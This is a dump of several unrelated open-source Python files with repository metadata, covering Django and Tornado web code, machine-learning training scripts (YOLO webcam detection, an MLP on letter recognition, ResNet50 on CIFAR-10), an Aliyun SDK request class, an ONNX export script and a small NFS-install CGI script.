e680ac98db693298f1bdeb9376fa11577feeb89a | c237e2f29eac2b92bd2b77d055e33cf760960284 | /todobackend/todo/serializers.py | dc073eafa9c9e17d9bdc60cc128b53a776392e7b | [] | no_license | razyesh/Django-TODO-React | 7f3293c858099f8656a287c8706f739b1d513077 | b8529138334710d582324f286c10a39197aca25d | refs/heads/master | 2022-12-11T11:20:33.622468 | 2019-06-28T10:28:03 | 2019-06-28T10:28:03 | 194,255,236 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 272 | py | from rest_framework import serializers
from .models import Todo
class TodoSerializer(serializers.ModelSerializer):
    """DRF serializer exposing the Todo model's fields over the API."""

    class Meta:
        model = Todo
        # Fields included in both serialized output and writable input.
        fields = (
            'id',
            'title',
            'description',
            'completed',
        )
"pudasainirajesh504@gmail.com"
] | pudasainirajesh504@gmail.com |
739a670634ba4397de44127cb5d1bb66b9097341 | 16512126cbb4a6ba16ea06f11b760e59236baa3b | /a.py | d83227abc60a10620ef008a3fff2dc93f205ae5c | [] | no_license | Aliced3645/CodeForFun | c7fa30465fea75c23851859ced0b89ed7bce9615 | 247c0e896244c8aad324981e8e9ffae374af8f64 | refs/heads/master | 2020-04-06T04:30:08.735734 | 2013-02-28T21:57:37 | 2013-02-28T21:57:37 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 413 | py |
#TODO: try tornado
import sys
sys.path.append("/usr/local/lib/python2.7/dist-packages/")
import tornado.ioloop
import tornado.web
class MainHandler(tornado.web.RequestHandler):
    """Serve a plain "Hello World" page at the site root.

    Fixed base class: the original subclassed RedirectHandler, which requires
    a `url` initialization argument and is meant for redirects, so every
    request would have failed before reaching get().
    """

    def get(self):
        self.write("Hello World")


# Route the root URL. The original pattern r"./" can never match, because
# routes are matched against the request path, which always starts with "/".
application = tornado.web.Application([
    (r"/", MainHandler),
])

if __name__ == "__main__":
    application.listen(8888)
    tornado.ioloop.IOLoop.instance().start()
| [
"shu_zhang@brown.edu"
] | shu_zhang@brown.edu |
85a34ac290ea296fd6e980ca8103553fd134a68d | d0aac2763f9ca7a4c7e157b3fbf8037915ff4abe | /compass/migrations/0002_auto_20190501_1551.py | 887c4768277b5e547146f92bc3c3e53a40d58481 | [] | no_license | anishpatelwork/RiskCompass | 4563696a345cb9de7a380f4678029f9c96625a4a | 56de749fb0e1674e27dc731394b05ba7880507eb | refs/heads/master | 2022-01-20T08:49:59.737469 | 2019-05-10T10:58:58 | 2019-05-10T10:58:58 | 128,987,628 | 0 | 1 | null | 2019-05-10T09:17:28 | 2018-04-10T19:54:47 | Python | UTF-8 | Python | false | false | 507 | py | # Generated by Django 2.2.1 on 2019-05-01 15:51
from django.db import migrations, models
import django.db.models.deletion
class Migration(migrations.Migration):
    """Re-declare Business_Priority.results FK with related_name='business_priority'."""

    dependencies = [
        ('compass', '0001_initial'),
    ]

    operations = [
        migrations.AlterField(
            model_name='business_priority',
            name='results',
            field=models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, related_name='business_priority', to='compass.Results'),
        ),
    ]
| [
"anish.patel2@rms.com"
] | anish.patel2@rms.com |
fa630ede4ee6b303b49df2800a562991fd84f857 | 53278297d92ee3431e9add18d4a5eaf8c240a987 | /streamlitWebCam.py | 3f7a772b2336066003d730503bc7f7f54e326f7a | [] | no_license | Islington1/dissertation_final | e1ecfa2c5499cce0110f8ac1942f35415edaca0c | f10041aefd038aceb5e2b123c6c25ffb22699824 | refs/heads/master | 2023-06-01T07:19:32.882539 | 2021-06-12T10:40:11 | 2021-06-12T10:40:11 | 376,184,455 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,915 | py | import cv2
import av
import numpy as np
from streamlit_webrtc import *
def web_cam1():
    """Streamlit page: live YOLOv3 object detection on the browser webcam.

    Frames are streamed through streamlit-webrtc; each one is run through a
    YOLOv3 network and returned with labelled bounding boxes drawn on it.
    """

    class VideoTransformer(VideoTransformerBase):
        def __init__(self):
            # Load the network and its metadata ONCE per session. The
            # original reloaded the weights, class names and colors inside
            # recv(), i.e. for every single frame, which made the stream
            # unusably slow.
            self.net = cv2.dnn.readNet("weights/yolov3.weights", "weights/yolov3.cfg")
            with open("weights/coco.names", "r") as f:
                self.classes = [line.strip() for line in f.readlines()]
            self.colors = np.random.uniform(0, 255, size=(len(self.classes), 3))
            self.font = cv2.FONT_HERSHEY_PLAIN

        def recv(self, frame: av.VideoFrame) -> av.VideoFrame:
            image = frame.to_ndarray(format="bgr24")
            blob = cv2.dnn.blobFromImage(cv2.resize(image, (300, 300)), 1/255, (320, 320), (0, 0, 0), swapRB=True, crop=False)
            self.net.setInput(blob)
            outs = self.net.forward(self.net.getUnconnectedOutLayersNames())

            (height, width) = image.shape[:2]
            class_ids = []
            confidences = []
            boxes = []
            for out in outs:
                for detection in out:
                    scores = detection[5:]
                    class_id = np.argmax(scores)
                    confidence = scores[class_id]
                    if confidence > 0.4:
                        # Scale the normalised centre/size back to pixel
                        # coordinates and convert to a top-left corner box.
                        center_x = int(detection[0] * width)
                        center_y = int(detection[1] * height)
                        w = int(detection[2] * width)
                        h = int(detection[3] * height)
                        x = int(center_x - w / 2)
                        y = int(center_y - h / 2)
                        boxes.append([x, y, w, h])
                        confidences.append(float(confidence))
                        class_ids.append(class_id)

            # Non-maximum suppression drops overlapping duplicate boxes.
            indexes = cv2.dnn.NMSBoxes(boxes, confidences, 0.4, 0.4)
            for i in range(len(boxes)):
                if i in indexes:
                    x, y, w, h = boxes[i]
                    label = str(self.classes[class_ids[i]])
                    confidence = str(round(confidences[i], 2))
                    color = self.colors[class_ids[i]]
                    cv2.rectangle(image, (x, y), (x + w, y + h), color, 3)
                    cv2.putText(image, label + " " + confidence, (x, y + 30), self.font, 3, color, 3)

            return av.VideoFrame.from_ndarray(image, format="bgr24")

    webrtc_streamer(
        key="web-detection",
        mode=WebRtcMode.SENDRECV,
        video_processor_factory=VideoTransformer,
        async_processing=True,
    )
| [
"support3@nt.com.np"
] | support3@nt.com.np |
5bb26342a634735c0ded562718ea28a68b5e18e1 | 716b900a6a963b466596dd8dd3b9ceeef9404b76 | /scripts/neuralnet-letter.py | 2905b8a1764023e7add3e8ff07d7d3e4ebbcfb8d | [] | no_license | manleyroberts/mlproject1 | b7646c4de4b724e57eb997ce4ea79267f13eba53 | cbeed7d4bb87d187dcefa58df7599b36d80c9dcb | refs/heads/master | 2020-04-22T02:53:08.377447 | 2019-02-11T04:31:21 | 2019-02-11T04:31:21 | 170,066,507 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 8,088 | py | #Source: https://www.geeksforgeeks.org/working-csv-files-python/
from sklearn import tree
from sklearn import svm
from sklearn.neural_network import MLPClassifier
from sklearn.metrics import accuracy_score, confusion_matrix
import csv
import numpy as np
import random
import matplotlib.pyplot as plt
from sklearn.model_selection import learning_curve
from sklearn.model_selection import ShuffleSplit
import seaborn as sn
import pandas as pd
from mpl_toolkits import mplot3d
import os
import string
out = []        # accuracy per (num_layers, layer_size) grid point
csvout = []     # rows for the MASTER.csv summary written below
# Hyper-parameter grid: hidden-layer count x hidden-layer width.
x_list = [5]
y_list = list(range(80, 81, 20))
for num_layers in x_list:
    newOut = []
    for layer_size in y_list:
        # Reload the UCI letter-recognition data for every configuration.
        rows = []
        with open("../data/letter/letter-recognition.data", 'r') as csvfile:
            csvreader = csv.reader(csvfile)
            fields = next(csvreader)  # first row consumed as a header
            for row in csvreader:
                rows.append(row)

        # 80/20 split; column 0 is the letter label, the rest are features.
        splitvalue = round(len(rows) * 0.8)
        trainset, testset = rows[:splitvalue], rows[splitvalue:]
        trainX = [[float(x) for x in r[1:]] for r in trainset]
        trainY = [float(ord(r[0])) for r in trainset]
        testX = [[float(x) for x in r[1:]] for r in testset]
        testY = [float(ord(r[0])) for r in testset]

        fileout = "NumLayers - " + str(num_layers) + ", LayerSize - " + str(layer_size)
        clf = MLPClassifier(solver='lbfgs', max_iter=1500,
                            hidden_layer_sizes=tuple(layer_size for layer in range(num_layers)))
        clf = clf.fit(trainX, np.array([[y] for y in trainY]).ravel())

        score = accuracy_score(testY, clf.predict(testX))
        correct = accuracy_score(testY, clf.predict(testX), normalize=False)
        newOut += [score]
        csvout += [[str(layer_size), str(num_layers), str(score)]]
        print(score)
        print(str(correct) + " correct of " + str(len(testX)))

        filename = "../letter-classification/neural/" + fileout + "/output.txt"
        os.makedirs(os.path.dirname(filename), exist_ok=True)
        with open(filename, "w") as f:
            f.write(str(score) + "\n")
            f.write(str(correct) + " correct of " + str(len(testX)))
    out += [newOut]

# No module docstring, so this prints "None" (kept from the sklearn example).
print(__doc__)
def plot_learning_curve(estimator, title, X, y, ylim=None, cv=None,
                        n_jobs=None, train_sizes=np.linspace(.1, 1.0, 5)):
    """Plot training and cross-validation score against training-set size.

    Parameters mirror ``sklearn.model_selection.learning_curve``:
    ``estimator`` is cloned and re-fitted for every (split, size) pair,
    ``cv`` selects the cross-validation strategy, and ``train_sizes`` gives
    the fractions (or absolute counts) of the training data to evaluate.
    ``ylim`` optionally fixes the score axis. Returns the
    ``matplotlib.pyplot`` module so the caller can save or show the figure.
    """
    plt.figure()
    plt.title(title)
    if ylim is not None:
        plt.ylim(*ylim)
    plt.xlabel("Training examples")
    plt.ylabel("Score")

    sizes, train_scores, valid_scores = learning_curve(
        estimator, X, y, cv=cv, n_jobs=n_jobs, train_sizes=train_sizes)
    train_mean = np.mean(train_scores, axis=1)
    train_std = np.std(train_scores, axis=1)
    valid_mean = np.mean(valid_scores, axis=1)
    valid_std = np.std(valid_scores, axis=1)

    plt.grid()
    # Shaded bands show +/- one standard deviation across the CV folds.
    plt.fill_between(sizes, train_mean - train_std, train_mean + train_std,
                     alpha=0.1, color="r")
    plt.fill_between(sizes, valid_mean - valid_std, valid_mean + valid_std,
                     alpha=0.1, color="g")
    plt.plot(sizes, train_mean, 'o-', color="r", label="Training score")
    plt.plot(sizes, valid_mean, 'o-', color="g", label="Cross-validation score")
    plt.legend(loc="best")
    return plt
# Dump the full hyper-parameter sweep to a master CSV.
with open("../letter-classification/neural/MASTER.csv", "w") as f:
    f.write("num_layers, layer_size, accuracy_score\n")
    for row in csvout:
        f.write(str(row[0]) + ", " + str(row[1]) + ", " + str(row[2]) + "\n")

# Locate the best-scoring configuration.
# NOTE(review): csvout rows are [layer_size, num_layers, score] as strings,
# and these two names are not used again below — confirm intent.
max_index = csvout.index(max(csvout, key=lambda x: x[-1]))
num_layers = csvout[max_index][0]
layer_size = csvout[max_index][1]

# Learning curve for the last-trained classifier.
title = "Learning Curve: Letter Recognition, Neural Net - " + fileout
plt2 = plot_learning_curve(clf, title, trainX, trainY, (0.0, 1.1), cv=5, n_jobs=4,
                           train_sizes=np.linspace(.1, 1.0, 5))
plt2.savefig("../letter-classification/neural/" + fileout + "/learning_curve.png", bbox_inches='tight')
plt2.close()

# Confusion-matrix heatmap labelled A-Z.
# https://stackoverflow.com/questions/35572000/how-can-i-plot-a-confusion-matrix
df_cm = pd.DataFrame(confusion_matrix([chr(int(y)) for y in testY],
                                      [chr(int(x)) for x in clf.predict(testX)]))
plt.figure(figsize=df_cm.shape)
sn.set(font_scale=1.4)  # label size
s = sn.heatmap(df_cm, annot=True, annot_kws={"size": 16})
s.set_xlabel('Predicted labels')
s.set_ylabel('True labels')
s.xaxis.set_ticklabels(list(string.ascii_uppercase))
s.yaxis.set_ticklabels(list(string.ascii_uppercase))
plt.savefig("../letter-classification/neural/" + fileout + "/confusion_matrix.png", bbox_inches='tight')
plt.close()

# 3-D surface of accuracy over the (num_layers, layer_size) grid.
fig = plt.figure()
ax = plt.axes(projection='3d')
print(x_list)
print(y_list)
print(out)
print(np.array(out, dtype=np.float64))
ax.contour3D(np.array(x_list), np.array(y_list), np.array(out, dtype=np.float64), 50, cmap='binary')
ax.set_xlabel('num_layers')
ax.set_ylabel('layer_size')
ax.set_zlabel('accuracy_score')
plt.savefig("../letter-classification/neural/MASTER.png")
plt.show()
"manleyroberts@gatech.edu"
] | manleyroberts@gatech.edu |
8c3742b2407dc06b1267312520d773fc84bd1c77 | d9deb2cd70e97546d2208d4e60c70e1a8c51efba | /keras-resnet/cifar10_resnet50_keras_kaggle_opt.py | e3367dbb314445ba40af1ac4221c9609ef9242d0 | [
"MIT",
"Apache-2.0"
] | permissive | sashkarivkind/imagewalker | 5353893fd43a096f1844527ab43261d7fb788f24 | 999e1ae78cfe1512e1be894d9e7891a7d0c41233 | refs/heads/master | 2021-11-28T14:31:36.893022 | 2021-11-22T16:01:42 | 2021-11-22T16:01:42 | 166,010,202 | 2 | 1 | MIT | 2021-04-28T13:43:03 | 2019-01-16T09:16:05 | Jupyter Notebook | UTF-8 | Python | false | false | 9,226 | py | # %% [markdown] {"id":"FStp_vbUkRz5"}
#
#
#
# # Transfer Learning
# In this notebook, we will perform transfer learning to train CIFAR-10 dataset on ResNet50 model available in Keras.
#
#
# %% [markdown] {"id":"qpiJj8ym0v0-"}
# ## Imports
# %% [code] {"id":"AoilhmYe1b5t","execution":{"iopub.status.busy":"2021-08-02T17:27:37.867617Z","iopub.execute_input":"2021-08-02T17:27:37.868472Z","iopub.status.idle":"2021-08-02T17:27:45.661016Z","shell.execute_reply.started":"2021-08-02T17:27:37.868405Z","shell.execute_reply":"2021-08-02T17:27:45.659904Z"}}
import os, re, time, json
# import PIL.Image, PIL.ImageFont, PIL.ImageDraw
import numpy as np
import sys
import cv2
# try:
# # %tensorflow_version only exists in Colab.
# % tensorflow_version
# 2.
# x
# except Exception:
# pass
import tensorflow as tf
from tensorflow.keras.applications.resnet50 import ResNet50
from matplotlib import pyplot as plt
import pdb
# import tensorflow_datasets as tfds
print("Tensorflow version " + tf.__version__)
# %% [markdown] {"id":"HuG_q_1jkaZ6"}
# ## Parameters
# %% [markdown] {"id":"v4ocPhg6J_xw"}
# - Define the batch size
# - Define the class (category) names
# %% [code] {"id":"cCpkS9C_H7Tl","execution":{"iopub.status.busy":"2021-08-02T17:27:56.551738Z","iopub.execute_input":"2021-08-02T17:27:56.552154Z","iopub.status.idle":"2021-08-02T17:27:56.557542Z","shell.execute_reply.started":"2021-08-02T17:27:56.552093Z","shell.execute_reply":"2021-08-02T17:27:56.55645Z"}}
# Minibatch size (NOTE(review): the fit/evaluate calls below pass batch_size=64
# explicitly, so this constant appears unused — confirm).
BATCH_SIZE = 32
# CIFAR-10 label names, index-aligned with the integer class ids.
classes = ['airplane', 'automobile', 'bird', 'cat', 'deer', 'dog', 'frog', 'horse', 'ship', 'truck']
# %% [markdown] {"id":"O-o96NnyJ_xx"}
# Define some functions that will help us to create some visualizations.
# %% [code] {"id":"CfFqJxrzoj5Q","execution":{"iopub.status.busy":"2021-08-02T17:28:01.661055Z","iopub.execute_input":"2021-08-02T17:28:01.661793Z","iopub.status.idle":"2021-08-02T17:28:01.681885Z","shell.execute_reply.started":"2021-08-02T17:28:01.661731Z","shell.execute_reply":"2021-08-02T17:28:01.680314Z"}}
# Matplotlib config
# plt.rc('image', cmap='gray')
# plt.rc('grid', linewidth=0)
# plt.rc('xtick', top=False, bottom=False, labelsize='large')
# plt.rc('ytick', left=False, right=False, labelsize='large')
# plt.rc('axes', facecolor='F8F8F8', titlesize="large", edgecolor='white')
# plt.rc('text', color='a8151a')
# plt.rc('figure', facecolor='F0F0F0')# Matplotlib fonts
# MATPLOTLIB_FONT_DIR = os.path.join(os.path.dirname(plt.__file__), "mpl-data/fonts/ttf")
# utility to display a row of digits with their predictions
# def display_images(digits, predictions, labels, title):
# n = 10
# indexes = np.random.choice(len(predictions), size=n)
# n_digits = digits[indexes]
# n_predictions = predictions[indexes]
# n_predictions = n_predictions.reshape((n,))
# n_labels = labels[indexes]
# fig = plt.figure(figsize=(20, 4))
# plt.title(title)
# plt.yticks([])
# plt.xticks([])
# for i in range(10):
# ax = fig.add_subplot(1, 10, i+1)
# class_index = n_predictions[i]
# plt.xlabel(classes[class_index])
# plt.xticks([])
# plt.yticks([])
# plt.imshow(n_digits[i])
# # utility to display training and validation curves
# def plot_metrics(metric_name, title, ylim=5):
# plt.title(title)
# plt.ylim(0,ylim)
# plt.plot(history.history[metric_name],color='blue',label=metric_name)
# plt.plot(history.history['val_' + metric_name],color='green',label='val_' + metric_name)
# %% [markdown] {"id":"wPq4Sw5akosT"}
# ## Loading and Preprocessing Data
# [CIFAR-10](https://www.cs.toronto.edu/~kriz/cifar.html) dataset has 32 x 32 RGB images belonging to 10 classes. We will load the dataset from Keras.
# %% [code] {"id":"E103YDdQ8NNq","execution":{"iopub.status.busy":"2021-08-02T17:31:58.167062Z","iopub.execute_input":"2021-08-02T17:31:58.167444Z","iopub.status.idle":"2021-08-02T17:32:18.257435Z","shell.execute_reply.started":"2021-08-02T17:31:58.167411Z","shell.execute_reply":"2021-08-02T17:32:18.254565Z"}}
def bad_res102(img, res):
    """Resample *img* to resolution *res* = (width, height) with bicubic interpolation.

    (Removed an unused ``sh = np.shape(img)`` local from the original.)
    """
    return cv2.resize(img, res, interpolation=cv2.INTER_CUBIC)
# Target resolution from argv (defaults to CIFAR-10's native 32x32).
new_res = int(sys.argv[1]) if len(sys.argv) > 1 else 32
print('-----------setting resolution to {} ------'.format( new_res))
(training_images, training_labels), (test_images, test_labels) = tf.keras.datasets.cifar10.load_data()
# Degrade every training image to new_res x new_res (bicubic resize).
training_images = np.array([bad_res102(xx,(new_res,new_res)) for xx in training_images])
# Hold out the last 5000 training images as the validation split.
validation_images = training_images[-5000:]
validation_labels = training_labels[-5000:]
training_images = training_images[:-5000]
training_labels = training_labels[:-5000]
# %% [markdown] {"id":"prd944ThNavt"}
# ### Visualize Dataset
#
# Use the `display_image` to view some of the images and their class labels.
# %% [code] {"id":"UiokWTuKo88c"}
# display_images(training_images, training_labels, training_labels, "Training Data" )
# %% [code] {"id":"-q35q41KNfxH"}
# display_images(validation_images, validation_labels, validation_labels, "Training Data" )
# %% [markdown] {"id":"ltKfwrCVNuIu"}
# ### Preprocess Dataset
# Here, we'll perform normalization on images in training and validation set.
# - We'll use the function [preprocess_input](https://github.com/keras-team/keras-applications/blob/master/keras_applications/resnet50.py) from the ResNet50 model in Keras.
# %% [code] {"id":"JIxdiJVKArC6"}
def preprocess_image_input(input_images):
    """Cast images to float32 and apply tf.keras' ResNet50 input preprocessing."""
    as_float = input_images.astype('float32')
    return tf.keras.applications.resnet50.preprocess_input(as_float)


# Preprocess both splits once, up front.
train_X = preprocess_image_input(training_images)
valid_X = preprocess_image_input(validation_images)
# %% [markdown] {"id":"2fooPL9Gkuox"}
# ## Define the Network
# We will be performing transfer learning on **ResNet50** available in Keras.
# - We'll load pre-trained **imagenet weights** to the model.
# - We'll choose to retain all layers of **ResNet50** along with the final classification layers.
# %% [code] {"id":"56y8UNFQIVwj"}
def feature_extractor(inputs):
    """Run *inputs* through ResNet50 (ImageNet weights, no top) as a feature extractor.

    Expects 224 x 224 x 3 tensors.
    """
    backbone = tf.keras.applications.resnet.ResNet50(
        input_shape=(224, 224, 3), include_top=False, weights='imagenet')
    return backbone(inputs)


def classifier(inputs):
    """Final dense layers plus the 10-way softmax classification head."""
    x = tf.keras.layers.GlobalAveragePooling2D()(inputs)
    x = tf.keras.layers.Flatten()(x)
    x = tf.keras.layers.Dense(1024, activation="relu")(x)
    x = tf.keras.layers.Dense(512, activation="relu")(x)
    return tf.keras.layers.Dense(10, activation="softmax", name="classification")(x)


def final_model(inputs):
    """Upsample the new_res-sized input to 224 x 224, then feature-extract and classify."""
    resize = tf.keras.layers.UpSampling2D(size=(224 // new_res, 224 // new_res))(inputs)
    return classifier(feature_extractor(resize))


def define_compile_model():
    """Build the full model and compile it with SGD + sparse categorical cross-entropy."""
    inputs = tf.keras.layers.Input(shape=(new_res, new_res, 3))
    model = tf.keras.Model(inputs=inputs, outputs=final_model(inputs))
    model.compile(optimizer='SGD',
                  loss='sparse_categorical_crossentropy',
                  metrics=['accuracy'])
    return model


model = define_compile_model()
model.summary()
# %% [markdown] {"id":"CuhDh8ao8VyB"}
# ## Train the model
# %% [code] {"id":"2K6RNDqtJ_xx"}
# NOTE: removed a leftover `pdb.set_trace()` breakpoint here — it drops into
# the interactive debugger and blocks any non-interactive run of the script
# before training even starts.
EPOCHS = 10
history = model.fit(train_X, training_labels, epochs=EPOCHS, validation_data=(valid_X, validation_labels),
                    batch_size=64, verbose=2)
# %% [markdown] {"id":"CYb5sAEmk4ut"}
# ## Evaluate the Model
#
# Calculate the loss and accuracy metrics using the model's `.evaluate` function.
# %% [code] {"id":"io7Fuu-w3PZi"}
loss, accuracy = model.evaluate(valid_X, validation_labels, batch_size=64)
# %% [markdown] {"id":"yml-phRfPeOj"}
# ### Plot Loss and Accuracy Curves
#
# Plot the loss (in blue) and validation loss (in green).
# %% [code] {"id":"b1ZMMJ6T921A"}
# plot_metrics("loss", "Loss")
# # %% [markdown] {"id":"QbnWIbeJJ_xx"}
# # Plot the training accuracy (blue) as well as the validation accuracy (green).
# # %% [code] {"id":"P0YpFs3J99eO"}
# plot_metrics("accuracy", "Accuracy")
# # %% [markdown] {"id":"9jFVovcUUVs1"}
# # ### Visualize predictions
# # We can take a look at the predictions on the validation set.
# # %% [code] {"id":"NIQAqkMV9adq"}
# probabilities = model.predict(valid_X, batch_size=64)
# probabilities = np.argmax(probabilities, axis = 1)
# display_images(validation_images, probabilities, validation_labels, "Bad predictions indicated in red.") | [
"sashkarivkind@gmail.com"
] | sashkarivkind@gmail.com |
a9844ec6bc76cbabb561aa8a324b90f85c935090 | f09dc121f213f2881df3572288b7ee5b39246d73 | /aliyun-python-sdk-hbr/aliyunsdkhbr/request/v20170908/DeleteSqlServerInstanceRequest.py | 8647a804d9271b31c253673d44db33fd213dcbae | [
"Apache-2.0"
] | permissive | hetw/aliyun-openapi-python-sdk | 2f31378ad6be0896fb8090423f607e9c7d3ae774 | 7443eacee9fbbaa93c7975c6dbec92d3c364c577 | refs/heads/master | 2023-01-19T22:42:36.214770 | 2020-12-04T10:55:14 | 2020-12-04T10:55:14 | 318,689,093 | 1 | 0 | NOASSERTION | 2020-12-05T03:03:03 | 2020-12-05T03:03:03 | null | UTF-8 | Python | false | false | 1,604 | py | # Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
#
# http://www.apache.org/licenses/LICENSE-2.0
#
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
from aliyunsdkcore.request import RpcRequest
from aliyunsdkhbr.endpoint import endpoint_data
class DeleteSqlServerInstanceRequest(RpcRequest):
    """RPC request wrapper for the HBR ``DeleteSqlServerInstance`` API (version 2017-09-08)."""

    def __init__(self):
        RpcRequest.__init__(self, 'hbr', '2017-09-08', 'DeleteSqlServerInstance', 'hbr')
        self.set_method('POST')
        # Wire up regional endpoint resolution when the SDK core supports it.
        if hasattr(self, "endpoint_map"):
            setattr(self, "endpoint_map", endpoint_data.getEndpointMap())
        if hasattr(self, "endpoint_regional"):
            setattr(self, "endpoint_regional", endpoint_data.getEndpointRegional())

    def get_VaultId(self):
        """Return the 'VaultId' query parameter (None when unset)."""
        return self.get_query_params().get('VaultId')

    def set_VaultId(self, VaultId):
        """Set the 'VaultId' query parameter."""
        self.add_query_param('VaultId', VaultId)

    def get_ClusterId(self):
        """Return the 'ClusterId' query parameter (None when unset)."""
        return self.get_query_params().get('ClusterId')

    def set_ClusterId(self, ClusterId):
        """Set the 'ClusterId' query parameter."""
        self.add_query_param('ClusterId', ClusterId)
"sdk-team@alibabacloud.com"
] | sdk-team@alibabacloud.com |
25c3b42a397977592ebd6616aeefe441954c721c | 2e682fd72e3feaa70e3f7bf2a3b83c50d783ec02 | /PyTorch/built-in/cv/classification/3D_ResNet_ID0421_for_PyTorch/pth2onnx.py | 344f0acb80d30eeb817bac80202a259a4e4fbed2 | [
"GPL-1.0-or-later",
"MIT",
"Apache-2.0",
"BSD-2-Clause",
"BSD-3-Clause",
"LicenseRef-scancode-generic-cla",
"LicenseRef-scancode-unknown-license-reference"
] | permissive | Ascend/ModelZoo-PyTorch | 4c89414b9e2582cef9926d4670108a090c839d2d | 92acc188d3a0f634de58463b6676e70df83ef808 | refs/heads/master | 2023-07-19T12:40:00.512853 | 2023-07-17T02:48:18 | 2023-07-17T02:48:18 | 483,502,469 | 23 | 6 | Apache-2.0 | 2022-10-15T09:29:12 | 2022-04-20T04:11:18 | Python | UTF-8 | Python | false | false | 2,739 | py | # Copyright 2020 Huawei Technologies Co., Ltd
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from pathlib import Path
import json
import random
import os
import numpy as np
import torch
from opts import parse_opts
from model import (generate_model, load_pretrained_model, make_data_parallel,
get_fine_tuning_parameters)
def json_serial(obj):
    """``default`` hook for json.dump: render pathlib.Path as its string form.

    Any other type falls through and returns None (serialised as null),
    matching the original implicit-return behaviour.
    """
    return str(obj) if isinstance(obj, Path) else None
def get_opt():
    """Parse command-line options, rebase paths onto ``root_path``, and
    persist the resolved options to ``opts.json`` in the result directory.

    Returns the populated options namespace.
    """
    opt = parse_opts()
    root = opt.root_path
    if root is not None:
        # Interpret every user-supplied path relative to the root directory.
        opt.video_path = root / opt.video_path
        opt.annotation_path = root / opt.annotation_path
        opt.result_path = root / opt.result_path
        if opt.resume_path is not None:
            opt.resume_path = root / opt.resume_path
    opt.arch = '{}-{}'.format(opt.model, opt.model_depth)
    opt.begin_epoch = 1
    opt.n_input_channels = 3
    print(opt)
    # Dump the resolved options next to the results for reproducibility;
    # json_serial turns Path objects into strings.
    opts_path = opt.result_path / 'opts.json'
    with opts_path.open('w') as opt_file:
        json.dump(vars(opt), opt_file, default=json_serial)
    return opt
def resume_model(resume_path, arch, model):
    """Load checkpoint weights into *model* in place and return it.

    Asserts that the checkpoint was produced for the same architecture
    string, and handles both plain modules and DataParallel-style wrappers
    (which keep the real network under ``model.module``).
    """
    print('loading checkpoint {} model'.format(resume_path))
    checkpoint = torch.load(resume_path, map_location='cpu')
    assert arch == checkpoint['arch']
    target = model.module if hasattr(model, 'module') else model
    target.load_state_dict(checkpoint['state_dict'])
    return model
def main_worker(index, opt):
    """Build the model, optionally restore a checkpoint, and export to ONNX.

    *index* is the (unused here) worker rank; *opt* is the namespace from
    get_opt().  Writes '3D-ResNets.onnx' to the working directory.
    """
    # Seed every RNG source so model construction is reproducible.
    for seed in (random.seed, np.random.seed, torch.manual_seed):
        seed(opt.manual_seed)
    model = generate_model(opt)
    if opt.resume_path is not None:
        model = resume_model(opt.resume_path, opt.arch, model)
    model = make_data_parallel(model, opt.distributed, opt.device)
    # Tracing input: batch of 10 clips, 3 channels x 16 frames x 112x112.
    example_input = torch.ones(10, 3, 16, 112, 112)
    torch.onnx.export(
        model,
        example_input,
        '3D-ResNets.onnx',
        input_names=['input'],
        output_names=['output'],
        export_params=True,
        do_constant_folding=True,
        verbose=True,
        opset_version=11)
    print('3D-ResNets.onnx export success')
if __name__ == '__main__':
    # Parse options once, force a CPU device (ONNX tracing needs no GPU),
    # and run the export worker directly; -1 means "no distributed rank".
    opt = get_opt()
    opt.device = torch.device('cpu')
    main_worker(-1, opt)
"wangjiangben@huawei.com"
] | wangjiangben@huawei.com |
7459fac5b14862577f264dc372ac0888fef1bbd3 | bb397d825e5f8c8104426ec0ae7ecadcf1e1a408 | /files/nfs_install.py | 9b931bfbbda772e33bf381912be20aade123b261 | [] | no_license | AishwaryaBhargava/automation-of-different-technologies | ca29efe14e9c55ef2df0d1fa5e00a7e8f2cf67e3 | 30d288a60941ed7e5ec5529f822b4e85ad5146cc | refs/heads/master | 2020-05-27T23:40:43.547973 | 2019-05-27T14:09:00 | 2019-05-27T14:09:00 | 188,822,059 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 237 | py | #!/usr/bin/python2
# Python 2 CGI handler: installs the NFS utilities package on the host.
# NOTE(review): the `commands` module is Python 2 only (removed in Python 3);
# use subprocess.getstatusoutput() when porting.
import commands as sp
print("content-type:text/html")
# Requires passwordless sudo for the CGI user; `yum -y` auto-answers prompts.
cmd="sudo yum install nfs-utils -y"
output=sp.getstatusoutput(cmd)
# getstatusoutput() returns (exit_status, output); 0 means the install succeeded.
if output[0]==0:
    # Redirect the browser to the NFS management page on success.
    print("location:nfs.py")
    print("")
else:
    print("")
    print("not installed")
| [
"noreply@github.com"
] | AishwaryaBhargava.noreply@github.com |
60b34903be6f840002151d09c5e58440231cbabf | 7cbc730e36312bfcbc850128aa362635709b21eb | /run.py | 83d38c2d880dc8d02a139b13235dd42e96f0663b | [] | no_license | rephus/healtcheck | 57a1f08d8b51c999bfe64da49a51bcf953eb032e | db9d4ad53d9cd882dcef4ea5f93db71567dbdcb3 | refs/heads/master | 2021-01-19T02:52:33.265742 | 2016-06-10T20:11:35 | 2016-06-10T20:11:35 | 60,874,080 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,707 | py | #!/usr/bin/python
import requests
import time
import sys
import ConfigParser
# Global variables
# NOTE(review): these timestamps are captured once at import time, so every
# message printed later reuses the script's start time, not the failure time.
todayDate=time.strftime("%Y/%m/%d")
